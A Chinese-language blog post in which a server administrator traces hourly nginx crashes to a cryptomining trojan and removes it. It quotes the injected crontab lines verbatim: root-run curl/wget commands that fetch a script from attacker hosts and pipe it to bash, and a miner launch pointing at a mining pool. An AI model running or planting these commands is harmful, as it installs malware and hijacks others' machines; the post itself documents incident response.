接手公司服务器也是一个偶然的机会。接过来后发现服务器nginx每天定时会在每小时的13分钟左右停止工作。之前的主管在服务器的定时任务中加了个任务，每分钟去检测nginx是否还在工作，如果停了，就重启，这样导致服务器时不时会挂掉。由于查看日志后发现这样事情很有规律，就想到应该是linux的定时任务管理器的问题，就去查看crontab的配置

```

cat /etc/crontab

```

发现文件最后被插入了好几条脚本：

26 * * * * root (curl -fsSL http://t.amynx.com/ln/a.asp?rdso_20200905*root*iZbp143t3oxdgqemvsvvt3Z*4d1c57c070fb458fdf51735851ac074845430ae63c0649fdd76cc5397fc9261c||wget -q -O- http://t.amynx.com/ln/a.asp?rdso_20200905*root*iZbp143t3oxdgqemvsvvt3Z*4d1c57c070fb458fdf51735851ac074845430ae63c0649fdd76cc5397fc9261c)|bash

13 * * * * root (curl -fsSL http://t.jdjdcjq.top/ln/a.asp?rdso_20200905*root*iZbp143t3oxdgqemvsvvt3Z*4d1c57c070fb458fdf51735851ac074845430ae63c0649fdd76cc5397fc9261c||wget -q -O- http://t.amynx.com/ln/a.asp?rdso_20200905*root*iZbp143t3oxdgqemvsvvt3Z*4d1c57c070fb458fdf51735851ac074845430ae63c0649fdd76cc5397fc9261c)|bash

58 * * * * root ps aux|grep lplp.ackng.com |grep -v grep || /.Xll/xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529

直接百度

发现这些脚本是一个叫比特币木马的。我去，居然是中了木马，直接变成了肉鸡。

分析脚本，发现第一句就来了个killall -9。我擦，怪不得nginx和tomcat会都挂掉呢，原来是进程被杀了。

接下来就好办了，先停止木马进程

ps -ef | grep lplp.ackng.com

kill -9 pid

然后删除crontab里的这三行代码,

停止crontab相关定时任务。

最后删除木马目录

rm -rf /.Xll

搞定。

过了一个小时，没有出现定时挂机的情况，正常了。